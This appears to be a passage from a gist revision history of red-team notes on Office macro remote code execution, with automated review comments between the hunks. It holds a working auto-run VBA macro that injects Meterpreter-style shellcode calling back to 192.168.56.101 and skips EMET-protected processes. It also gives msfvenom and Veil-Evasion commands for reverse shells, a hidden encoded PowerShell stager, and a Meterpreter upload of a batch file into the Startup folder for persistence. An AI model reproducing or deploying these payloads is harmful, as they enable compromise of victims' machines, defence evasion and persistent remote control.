    myList = myList & "C:\Windows\SysWOW64\wbem\WMIADAP.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WMIC.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\wbem\WmiPrvSE.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" & ","
    myList = myList & "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe" & ","
    myArray = Split(myList, ",")
    Dim c As Integer
    Dim list() As String
    For c = LBound(myArray) To (UBound(myArray) - 1)
    ReDim Preserve list(c)
    list(c) = myArray(c)
    Next
    c = UBound(list)
    Dim colFiles As New Collection
    RecursiveDir colFiles, "C:\Program Files", "*.exe", True
    RecursiveDir colFiles, "C:\Program Files (x86)", "*.exe", True
    RecursiveDir colFiles, "C:\Intel", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\Syswow64", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\System32", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\winsxs", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\System32\DriverStore\FileRepository", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Workflow.Compiler\", "*.exe", True
    RecursiveDir colFiles, "C:\Windows\Microsoft.NET\Framework\", "*.exe", True
    Dim vFile As Variant
    For Each vFile In colFiles
    ReDim Preserve list(c)
    list(c) = vFile
    c = c + 1
    Next vFile
    getList = list
    End Function
    Public Function pathOf(program As String) As String
    pathOf = ""
    If program Like "*.exe" Then
    program = program
    Else
    program = program & ".exe"
    End If
    If program Like "*:\*" Then
    pathOf = program
    Exit Function
    Else
    paths = Environ("PATH")
    Dim allPaths() As String
    allPaths = Split(paths, ";")
    Dim Path As Variant
    For Each Path In allPaths
    ' With more complex env variables - esp complex path set - need to do some tidying or quote errors
    If Right(Path, 1) = Chr(34) Then 'Check if string ends with a quote
    ms = Mid(Path, 2, Len(Path) - 2) & "\" & program
    Else
    ms = Path & "\" & program
    End If
    If Not Dir(ms, vbDirectory) = vbNullString Then
    pathOf = ms
    Exit Function
    End If
    Next
    End If
    End Function
    Public Function getEMET() As String()
    Set objShell = CreateObject("WScript.Shell")
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set oReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv")
    oReg.EnumValues HKEY_LOCAL_MACHINE, "SOFTWARE\Microsoft\EMET\AppSettings", arrValues, arrTypes
    Dim smack() As String
    Dim count As Integer
    If IsArray(arrValues) Then
    For count = LBound(arrValues) To UBound(arrValues)
    ReDim Preserve smack(count)
    smack(count) = arrValues(count)
    Next
    Else
    ReDim Preserve smack(0)
    smack(0) = ""
    End If
    getEMET = smack
    End Function
    Public Function AutoPwn() As Long
    myArray = FightEMET
    Dim Count As Integer
    Dim Success As Integer
    For Count = LBound(myArray) To UBound(myArray)
    Dim proc As String
    proc = myArray(Count)
    Success = Inject(proc)
    If Success = 1 Then Exit For
    Next
    End Function
    Public Function FightEMET() As String()
    myArray = getList
    smex = getEMET
    Dim count As Integer
    Dim sCount As Integer
    Dim kCount As Integer
    kCount = 0
    Dim killedEMET() As String
    For count = LBound(myArray) To UBound(myArray)
    progo = myArray(count)
    prog = Split(progo, ".exe")
    kk = Replace(prog(0), "\\", "\")
    Dim gg As String
    gg = kk
    pathKK = Replace(pathOf(Replace(gg, """", "")), "\\", "\")
    Dim fudgeBool As Boolean
    fudgeBool = False
    If Not smex(0) = "" Then
    For sCount = LBound(smex) To UBound(smex)
    If LCase(pathKK) Like LCase(smex(sCount)) Then
    fudgeBool = True
    End If
    Next
    End If
    If fudgeBool = False Then
    ReDim Preserve killedEMET(kCount)
    killedEMET(kCount) = myArray(count)
    kCount = kCount + 1
    End If
    Next
    FightEMET = killedEMET
    End Function
    Public Function Inject(processCmd As String) As Long
    Dim myByte As Long, buf As Variant, myCount As Long, hProcess As Long
    #If VBA7 Then
    Dim lLinkToLibary As LongPtr, rekt As LongPtr, hThread As LongPtr
    #Else
    Dim lLinkToLibary As Long, rekt As Long, hThread As Long
    #End If
    Dim pInfo As PROCESS_INFORMATION
    Dim sInfo As STARTUPINFO
    Dim sNull As String
    Dim sProc As String
    sInfo.dwFlags = 1
    If IsOffice64Bit Then
    On Error Resume Next
    sProc = processCmd
    res = dragonascent(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
    hProcess = pInfo.hProcess
    Dim b64 As Boolean
    b64 = False
    b64 = IsWow64(hProcess)
    inject64 = True
    If b64 = True Then
    If inject64 = True Then
    If hProcess = 0 Then
    Exit Function
    End If
    lLinkToLibrary = watergun(hProcess, 0&, &H2be, &H3000, PAGE_READWRITE)
    If lLinkToLibrary = 0 Then
    sly = bodyslam(hProcess, lol)
    Exit Function
    End If
    Position = lLinkToLibrary
    buf = Array(72,131,228,240,232,204,0,0,0,65,81,65,80,82,81,86,72,49,210,101,72,139,82,96,72,139,82,24,72,139,82,32,72,139,114,80,72,15,183,74,74,77,49,201,72,49,192,172,60,97,124,2,44,32,65,193,201,13,65,1,193,226,237,82,65,81,72,139,82,32,139,66,60,72,1,208,102,129,120,24,11,2,15,133,114,0,0,0,139,128,136,0,0,0,72,133,192,116,103,72,1, _
    208,80,139,72,24,68,139,64,32,73,1,208,227,86,72,255,201,65,139,52,136,72,1,214,77,49,201,72,49,192,172,65,193,201,13,65,1,193,56,224,117,241,76,3,76,36,8,69,57,209,117,216,88,68,139,64,36,73,1,208,102,65,139,12,72,68,139,64,28,73,1,208,65,139,4,136,72,1,208,65,88,65,88,94,89,90,65,88,65,89,65,90,72,131,236,32,65,82,255,224, _
    88,65,89,90,72,139,18,233,75,255,255,255,93,72,49,219,83,73,190,119,105,110,105,110,101,116,0,65,86,72,137,225,73,199,194,76,119,38,7,255,213,83,83,72,137,225,83,90,77,49,192,77,49,201,83,83,73,186,58,86,121,167,0,0,0,0,255,213,232,15,0,0,0,49,57,50,46,49,54,56,46,53,54,46,49,48,49,0,90,72,137,193,73,199,192,187,1,0,0,77, _
    49,201,83,83,106,3,83,73,186,87,137,159,198,0,0,0,0,255,213,232,121,0,0,0,47,72,97,53,67,82,111,71,82,69,107,50,89,104,112,109,69,119,82,112,74,106,119,90,50,102,57,50,104,111,75,119,97,113,54,83,108,45,56,104,66,76,112,57,72,116,101,114,76,54,114,86,99,56,74,112,77,85,113,100,75,106,95,77,80,85,100,99,49,105,82,106,71,56,88,117, _
    103,57,69,95,53,101,98,121,52,65,65,108,99,119,73,81,73,89,51,74,99,54,98,102,73,101,105,84,115,55,104,104,49,89,99,107,99,118,115,108,50,52,111,70,0,72,137,193,83,90,65,88,77,49,201,83,72,184,0,50,160,132,0,0,0,0,80,83,83,73,199,194,235,85,46,59,255,213,72,137,198,106,10,95,72,137,241,106,31,90,82,104,128,51,0,0,73,137,224,106, _
    4,65,89,73,186,117,70,158,134,0,0,0,0,255,213,72,137,241,83,90,77,49,192,77,49,201,83,83,73,199,194,45,6,24,123,255,213,133,192,117,31,72,199,193,136,19,0,0,73,186,68,240,53,224,0,0,0,0,255,213,72,255,207,116,2,235,173,232,86,0,0,0,83,89,106,64,90,73,137,209,193,226,16,73,199,192,0,16,0,0,73,186,88,164,83,229,0,0,0,0, _
    255,213,72,147,83,83,72,137,231,72,137,241,72,137,218,73,199,192,0,32,0,0,73,137,249,73,186,18,150,137,226,0,0,0,0,255,213,72,131,196,32,133,192,116,178,102,139,7,72,1,195,133,192,117,210,88,88,195,88,106,0,89,73,199,194,240,181,162,86,255,213)
    For myCount = LBound(buf) To UBound(buf)
    myByte = buf(myCount)
    rekt = thunderbolt(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
    Next myCount
    hThread = flamethrower(hProcess, 0&, 0&, ByVal lLinkToLibrary, 0, 0, ByVal 0&)
    End If
    If hThread = 0 or Inject64 = False Then
    If lLinkToLibrary <> 0 Then
    leechseed hProcess, lLinkToLibrary, 0, MEM_RELEASE
    End If
    hProcess = pInfo.hProcess
    sly = bodyslam(hProcess, lol)
    Exit Function
    Else
    Inject = 1 'Success
    End If
    Else
    If hProcess = 0 Then
    Exit Function
    End If
    lLinkToLibrary = watergun(hProcess, 0&, &H1b5, &H3000, PAGE_READWRITE)
    If lLinkToLibrary = 0 Then
    sly = bodyslam(hProcess, lol)
    Exit Function
    End If
    Position = lLinkToLibrary
    buf = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1,199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193,207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1, _
    211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,219,83,83,83,83,83,104,58,86,121,167,255,213,83,83,106,3,83,83,104,187,1,0,0,232,192,0,0,0,47,85,55,69,102,86,99,88,70,120,72,104,116,122,87,122,77, _
    78,70,71,57,76,103,105,122,109,118,108,72,79,115,56,77,119,111,66,55,100,78,84,79,103,108,76,66,99,65,89,0,80,104,87,137,159,198,255,213,137,198,83,104,0,50,224,132,83,83,83,87,83,86,104,235,85,46,59,255,213,150,106,10,95,104,128,51,0,0,137,224,106,4,80,106,31,86,104,117,70,158,134,255,213,83,83,83,83,86,104,45,6,24,123,255,213,133,192,117, _
    20,104,136,19,0,0,104,68,240,53,224,255,213,79,117,205,232,75,0,0,0,106,64,104,0,16,0,0,104,0,0,64,0,83,104,88,164,83,229,255,213,147,83,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139,7,1,195,133,192,117,229,88,195,95,232,107,255,255,255,49,57,50,46,49,54,56,46,53,54,46,49,48,49,0,187,240,181,162, _
    86,106,0,83,255,213)
    For myCount = LBound(buf) To UBound(buf)
    myByte = buf(myCount)
    rekt = thunderbolt(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
    Next myCount
    hThread = flamethrower(hProcess, 0&, 0&, ByVal lLinkToLibrary, 0, 0, ByVal 0&)
    If hThread = 0 Then
    If lLinkToLibrary <> 0 Then
    leechseed hProcess, lLinkToLibrary, 0, MEM_RELEASE
    End If
    hProcess = pInfo.hProcess
    sly = bodyslam(hProcess, lol)
    Exit Function
    Else
    Inject = 1 'Success
    End If
    End If
    Else
    sProc = processCmd
    res = dragonascent(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
    hProcess = pInfo.hProcess
    If hProcess = 0 Then
    Exit Function
    End If
    lLinkToLibrary = watergun(hProcess, 0&, &H1b5, &H3000, PAGE_READWRITE)
    If lLinkToLibrary = 0 Then
    sly = bodyslam(hProcess, lol)
    Exit Function
    End If
    Position = lLinkToLibrary
    buf = Array(232,130,0,0,0,96,137,229,49,192,100,139,80,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,172,60,97,124,2,44,32,193,207,13,1,199,226,242,82,87,139,82,16,139,74,60,139,76,17,120,227,72,1,209,81,139,89,32,1,211,139,73,24,227,58,73,139,52,139,1,214,49,255,172,193,207,13,1,199,56,224,117,246,3,125,248,59,125,36,117,228,88,139,88,36,1, _
    211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,95,95,90,139,18,235,141,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,219,83,83,83,83,83,104,58,86,121,167,255,213,83,83,106,3,83,83,104,187,1,0,0,232,192,0,0,0,47,85,55,69,102,86,99,88,70,120,72,104,116,122,87,122,77, _
    78,70,71,57,76,103,105,122,109,118,108,72,79,115,56,77,119,111,66,55,100,78,84,79,103,108,76,66,99,65,89,0,80,104,87,137,159,198,255,213,137,198,83,104,0,50,224,132,83,83,83,87,83,86,104,235,85,46,59,255,213,150,106,10,95,104,128,51,0,0,137,224,106,4,80,106,31,86,104,117,70,158,134,255,213,83,83,83,83,86,104,45,6,24,123,255,213,133,192,117, _
    20,104,136,19,0,0,104,68,240,53,224,255,213,79,117,205,232,75,0,0,0,106,64,104,0,16,0,0,104,0,0,64,0,83,104,88,164,83,229,255,213,147,83,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,207,139,7,1,195,133,192,117,229,88,195,95,232,107,255,255,255,49,57,50,46,49,54,56,46,53,54,46,49,48,49,0,187,240,181,162, _
    86,106,0,83,255,213)
    For myCount = LBound(buf) To UBound(buf)
    myByte = buf(myCount)
    rekt = thunderbolt(hProcess, ByVal (lLinkToLibrary + myCount), myByte, 1, b)
    Next myCount
    hThread = flamethrower(hProcess, 0&, 0&, ByVal lLinkToLibrary, 0, 0, ByVal 0&)
    If hThread = 0 Then
    If lLinkToLibrary <> 0 Then
    leechseed hProcess, lLinkToLibrary, 0, MEM_RELEASE
    End If
    hProcess = pInfo.hProcess
    sly = bodyslam(hProcess, lol)
    Exit Function
    Else
    Inject = 1 'Success
    End If
    End If
    End Function
    Sub AutoOpen()
    DieTotal
    AutoPwn
    End Sub
    Sub Workbook_Open()
    DieTotal
    AutoPwn
    End Sub
    ```

    ---
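Review bot: the `buf = Array(...)` shellcode blobs carry the listener address in the clear, as the decimal ASCII run `49,57,50,46,49,54,56,46,53,54,46,49,48,49` ("192.168.56.101") in both the 64-bit array and the 32-bit arrays, and the 32-bit array in the `Else` branch of `If b64 = True` is byte-for-byte identical to the one in the outer `Else` of `If IsOffice64Bit`; the surrounding text never says either. A sentence noting that the address from the page header is baked into the arrays, and that the second 32-bit copy exists only because of the branch structure, would save readers from diffing the blobs by hand and makes clear that a static scan of the macro source sees the callback address directly.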
  9. @mgeeky mgeeky revised this gist Aug 23, 2017. 1 changed file with 48 additions and 0 deletions.
    48 changes: 48 additions & 0 deletions Various-Macro-Based-RCEs.md
    @@ -12,6 +12,7 @@ List:
    3. Metasploit generated payload `vba-exe`
    4. Metasploit generated payload `vba-psh`
    5. `Empire` generated `windows/macro` stager
    6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro


    ---
    @@ -513,3 +514,50 @@ Obviously we can enhance it any further as we wish, as well as obfuscate it litt

    ---

    **6. Using `Veil-Evasion` generated _powershell.exe_ command within `Luckystrike` generated macro**

    This one is quite fancy. Firstly, we generate `powershell.exe -Command "[...]"` Shell command that will get executed directly from within Macro code prepared by hand or by Luckystrike (the latter tool doesn't introduce anything fancy here).

    - So, the first step is to obtain a Powershell command for **windows/meterpreter/reverse_https**:

    ```
    ./Veil.py -t Evasion -p 21 --ip 192.168.56.101 --port 443 --msfvenom windows/meterpreter/reverse_https --msfoptions LHOST=192.168.56.101 LPORT=443 -o msf2
    ```

    We will get a result similar to:

    ```
    ===============================================================================
    Veil-Evasion
    ===============================================================================
    [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
    ===============================================================================
    [*] Language: powershell
    [*] Payload Module: powershell/meterpreter/rev_https
    [*] PowerShell doesn't compile, so you just get text :)
    [*] Source code written to: /usr/share/veil-output/source/msf2.bat
    [*] Metasploit RC file written to: /usr/share/veil-output/handlers/msf2.rc
    ```

    - Then we edit the resulted **msf2.bat** file to make it leverage `start /b`. To do so, we prepend every **powershell.exe** invocation with this `start /b` command.

    This script should look like:

    ```
    @echo off
    if %PROCESSOR_ARCHITECTURE%==x86 (start /b powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (start /b %WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"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\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")
    ```

    - Afterwards, we upload the resulted **msf2.bat** file to the target machine, for instance via _Meterpreter_:

    ```
    meterpreter> upload /usr/share/veil-output/source/msf2.bat "%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\nasty.bat"
    ```

    And that's all.



    ---
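Review bot: the heading promises the Veil command "within `Luckystrike` generated macro", but the steps shown stop at editing msf2.bat and uploading it to the Startup folder through the Meterpreter session; no macro, Luckystrike's or hand-written, appears in the hunk, and the closing "And that's all." leaves that gap unacknowledged. Either retitle the section to match what is demonstrated or state that the macro wrapping is left out. Also, "the resulted **msf2.bat** file" (used twice) should be "the resulting **msf2.bat** file".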
  10. @mgeeky mgeeky revised this gist Aug 21, 2017. 1 changed file with 57 additions and 2 deletions.
    59 changes: 57 additions & 2 deletions Various-Macro-Based-RCEs.md
    @@ -10,7 +10,8 @@ List:
    1. The [Unicorn](https://github.com/trustedsec/unicorn) **Powershell** based payload
    2. `regsvr32` based method
    3. Metasploit generated payload `vba-exe`
    4. `Empire` generated `windows/macro` stager
    4. Metasploit generated payload `vba-psh`
    5. `Empire` generated `windows/macro` stager


    ---
    @@ -362,7 +363,61 @@ As the macro's comment suggest, the long blob of bytes at the end of this script
    ---


    **4. `Empire` generated `windows/macro` stager**
    **4. Metasploit generated payload `vba-psh`**

    In this method, we leverage the Metasploit's `msfvenom` utility to generate a `vba-psh` payload that is similar to `Unicorn` in its form meaning that this is a payload consiting of `powershell.exe` invocation.

    We can generate this macro as follows:

    ```
    work|16:42|~ # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=443 -f vba-psh
    ```

    Then we will get the following output:

    ```
    Sub pm6HSAm()
    Dim rkEsZ
    rkEsZ = "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB" _
    & "3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHM" _
    & "ALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEATQB" _
    & "wAHAAbQAxAGsAQwBBADcAMQBXAGIAVwAvAGEAUwBCAEQAKwBuAEUAcgA5AEQAMQBhAEYAaABLADAAUwBiAEEAaAB0AG0AawBpAFYAYgBvADAAQgBrADIAQQBDAGMAWQBBAEEAUgBkAFYAaQByADgAMgBTAHQAWgBmAFkAYQA5ADUANgAvAGUAOAAzAEIAdAB6AFEATgBqAG4AbAA3AHEAUwB6AFEATgA3AGQAbQBkAG0AWgBmAGUAYQBaAEgAWAB0AEo" _
    & "ANgBBAGoASwBRADIAawBaAGEAMAB3ADMAagBmAGwAVQArAHYAYgAyAHoAVQBrAEgAUgB6AGkAUQA1AEYAeABRAEUAcQBPAEMAbABQAE8ATQB3AGUAUAA2AEkAdABaAHMAeQA2AG8AcQBKAHkAZQBnAGsAQQBzAEgASgBQAHgAQQBwAE0AKwBTAFAARQBhAEwAaABjAEUARABUAE0AUABKADUAVwBVADEAaQBTAEkAUwBpAHYAMgA4ADIAQwBBAEMAeAB" _
    & "UAEUASgBwAG8AeQBTAFcARgBhAGsAUAA2AFgAQgBqAEUAVABrADkARwBZADYASgA0ADYAUQB2AGsAbQA1AHIAOABVAEcANAAxAFAATQBEAG0AcQBiAEsAbgBaAG0AUgBEAHAARgBvAFoAdgBLAFcAdAB6AEIAYQBYAFIARgBlADgARwBvAGsAUABOAGYAdgB1AFMAVgA4AFcAbABwAFUAcQB3ADkASgBwAGoARgBjAHQANwBlAHgASQBJAEUAUgBaAGU" _
    & "AeAB2AEMASgA5AFYAMQBLAEgAZAA1AHMARgBrAGYATQBXAGQAUwBJAGUAYwAwADgAVQBCAHoAUQA4AEsAeABkADcAWQBZAHcAOQAwAG8AYgBkAGwAcwBRAGkAWQBzAGIAZABPAEsALwBBAE8AZQBBAFgARQBaAEYARQBvAFgAUQA0AFUAYgByAEYAWABrAEgATwB3ADcAQQBUAGMAUQBlADUAYgBrAFIAaQAwAEMAOAAyAHcAeQBWAC8ASQBIAEkAdQB" _
    & "UAEIAZwByAFMASAAvAEkANAA0AFAALwAyAHkAUQBVAE4AQwBBAGcARgB5AFQAaQBDADUAdABFAFMAKwBxAFEAdQBHAGoAaQAwAEcAWABrAGwAbgBnAFQAdQBVADEAVwAyAGIARgBmAGEAeQBRAGYARwA0AEYAVwBSADAAUgBLAEEAWgBMAHkAYgBLAEEAVwBkAHgATgBHADkAcgBaADUANQBmAGQAUQBkADYAbABVADQAUABrADEAbgBZAEQAQwA5ADc" _
    & "AZAB2ADMAcgA3AHgATQBpAFoAZwByAFcANgBZAHcANAB0AGoASABzAEQAbwBaAEwAdwBiAEUANABoAFYANwB2AEMAWQA3AGwAUQAvAFMAMQBwAEIAcwBzAEEAbgBGAGoAegBhAHcARABSADMARgB5AFYARQBtAFUAagBqAE4AQQB2AGoAeQBRAFIAOABOAGMAaABkAGUASQA3AEYAOQBLAGIAdwA4AGkANgBsAHoAQQBRAE0AbwBqAEMAZQBEAGMAMwB" _
    & "xADMAUABpADAAQgBNAG0ANAB6ADYAawA3AEEAYwB0AEQAcwBuAEwATwBkAEgAcAA3AE0AMwBlADAAMAB0AGsAZwBGAGIALwBNAFAAWQBOADQATgBDAFQARwBKAHMAUQBCAGQAVABKADYAeQBjAC8AbABnAFgAaQBNADcASQA1AGUAegBOAFQAYQBFAEsASwBjAFAAdwBpAEkAYQB4AEIARwBmAEMAeABTAFgAQQB2AFMAKwBIAGUAegBXAGsARABGAEQ" _
    & "AMQBzADkAbwBjAHcAbABFAFgASQBnAGwAegBGAEUAQgBXAGwAVwBmAGcANQBtAG4AeQBvADUAMwB3AHcAdABFAGcAQgB1ACsAMwBrACsAVABRAHkAUQBtAG0AVABhAEIAeQBKAHYATQB1AC8AcABIAEoAVAB5AFYAWQBiAGoAdQBDAEIAMQBFAHEAZwBxAHAAeQBEAFoAQgBEAFAAaQBGAGkAUQBVAHgAdgBRAGcAUQBvAG4AZwB1ADIASAArAEsAVgB" _
    & "3AHIAWQBZAEkANgBPAEIAYgBaAGQAaABQAGwARgB6AGcAUABiAHEAcwA4AGoARQBXAFUATwBKAEIAUgBnAE8ARABPAFgAaABDAEgAWQBwAFkAaQBVAHAAQgBNADYAaABKADkAWQAxAE0ALwBjADUAOQAvAEYAbwA4AHEAWgBvAHkARwBQAHUAeQAwAGgASAB6AEEAUwBvAHEARABMAFYASwBlAFIARwA3AGgAbQBCAE4ASwAwAFMAYQBpAEcAUwB3AFk" _
    & "AQwBVAEIAegBWACsAdAAxAGgAbgAyAG8ANwBFAE4AMQA3AE8AaQBGAGYAZQBMAG0AWAB3AGcAMwBLADQARQA5ADMAMQBOADgATQBtAEMATwBnAG8AVwBrADIANAB5AEwAZwB0AFMAbgBrAFkAQwBiAEkAOABYADYAaQBHAGYALwBKAGEAUwBqAEMAKwBRADQAdQBHAHAARQBEAGkAbQBUAHMAdwBJAGIANgB4AHUAUgAxAGsAUgB1ADEAYgA3AHAAcAB" _
    & "kAHcAOQBBAEwAZQBEAEsAUgBJAEEAVQBUADMAaQBnAFkANQBqADgAcgBGAGkAaQB3AGcAQQBsAE4AKwBwAE4ANwBTAEsANABCAGsAMgBRADIAWQA1ACsAZwBNAHQAbwBSAFUAdABOAFMAMwA0ADkAKwBoAFoAawB4AHYAbgA3AHYAWABWADMARgBRAGoAWQB6ADMAegBVAEQATgB1AFcAbQBiAEgANgBKAHAAbQBaAFgAbABsADkAeQB2AEMAcgBqAFg" _
    & "ARgBkAGEAYwBwAHIATgByADkAZgBHADQAagA4ADcAWQAzAEYASwBNAG0ATQB1ACsAbwA5AGoAQwBzAGIAQgBkAFgAZABHAHUAMwBrAEQAdABjAHEAeAArADMAKwBuAGEAbAA2AGUAdgB0ADMASABlADkAbwBlAEYANQAvAHIAbABuADMANQBZACsAMQBHAGwAcgBVAE8AMwBxAFcAaABtADMAagBGAHIAUwBHAHUAZwByAFgAYQB2AEUATgBiAG8AeQB" _
    & "1ADcAVABYAGYAYgBpAHEAaQArAG0AdwB6ADMARABQAFUALwAzADcAMABnAFcAbQA2ADEAWQAwADcANQBlADQAdABXADAAaQAxAEoAaQBkAE8AZABzAHIAcgA5ACsAWQBXAGUANQBtAGEASwBvAFgAZwA4AG8ARABxAGkARgBVAEQAVwB2ADkAdQBzADYAdgBoADMAcQBFAE8AbQBvAGYAKwAzADIAKwB1AHYAWQByAG8ANABFAFAAWgAyADIAYwBVAHo" _
    & "ATABxADkAdQBwADYAdAAxAHYAWABVAGEAOAB4AGYAegBRAHUAVgBCADkAcwA3AC8ARgBNAEgALwBUAEwAZABMAFMANAB2ADUAMwBCAHYAQQA0AGgAWABLAHQAYQBwAGUAbQBTAEwAUgA5ADIAQQBhAFEARwBSADkAaQAvAEIAUgAyAC8AVwBuAFoAbQBIAHUAZwBZADcANQBIACsAdgBzADMAagBNAG4ANwBRAE8AZABKAEIAcAB6ADUANgBoAEwAaQB" _
    & "HAGkAMwBxAEgAZwBmAHkAdQBWACsAYQBvAHoAOQByADMARwBMAFYARwBtADcAcQBxAGwAbwBhAGQAQwBqAEkAMQBPAG0AagA0AEsATgAwAFMAKwAzAG8AWABvADMAaABwAGIAQQAyADEAMQBIAGUANQBPAC8AagBRAEgAbgBwAHEALwA1ADYAZABxADAAYgAxAGIAdQBGADQAcQBxAHEAdQBUAE8AUABhAEcAWgBYAFcAbgAyADcATwBQADcAVQBHAHQ" _
    & "AQgA5AHcAMQBGAFAAVgAvAHIAdQBVAEgAcwBDAFAASABGADUAdgBMAHMANAB2AHYAcABhAG4AUgAwAGwALwA2AGYASwAzAGMAQgBUAFAATQBBAE0AeQB3AEoAMgBlAGwAVwBxAGQAUgAvAFgARAA3AGQAegBoAE4ATABXAFEANQBhAGQAKwAvAFUAQwBpAGsARABEAG8AYwBkAEEARgBNADQASQBqAHgAcgBpAFQATgBvAHYAcwBNAG8AZABlAHQAZQA" _
    & "4AGcARQA2AGoAWQBIAGcAegBQAHkAcwArAE8ARgBPAG0ASABvAHYATABVAFIAYgBLAGwAeQA4AHMAUgBSAEEAdgBsAGsAbABLADQAMgBDAEsAaABMADIAWQBGAGIAWAAyAG0AYQBkAEEASAB0AEgAVgBGAGcAeQBPAC8ALwBvAFIAVgB2AHQAagBJAHUANgAwAEsAYQBSADkANQB3AGkAbAB6AHcASABZAE8AbABMAFIANABjAHMAbQBxAE8AZwAxAHE" _
    & "AWgBCAFMASQAvAHcASABGAFEALwBYAE8ANABPAFcAKwBBAHMAVwBuAHQAYgArAFIAdgBnAHAAWgByAFgAQwBFAHcAbQArAHkAbgB4AGYAKwBFAGQAYgAvAEQAbwBjAEIAcABnAEwAVQBiAGIAaQBMAEcATgBsADMAegBSAGYAaABPAFAARABuADYATgBQAGoASwBXAFgAQQBFAGUALwB3AHAAQgArAEIATgA0AGsANABiAGMATgAzAHkAVgArAGQAQgB" _
    & "SADEAQQBmAFEAbwBBAEEAQQA9AD0AJwAnACkAKQA7AEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACQAcwAsAFsASQBPAC4AQwBvAG0AcAByAGU" _
    & "AcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7ACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZAB" _
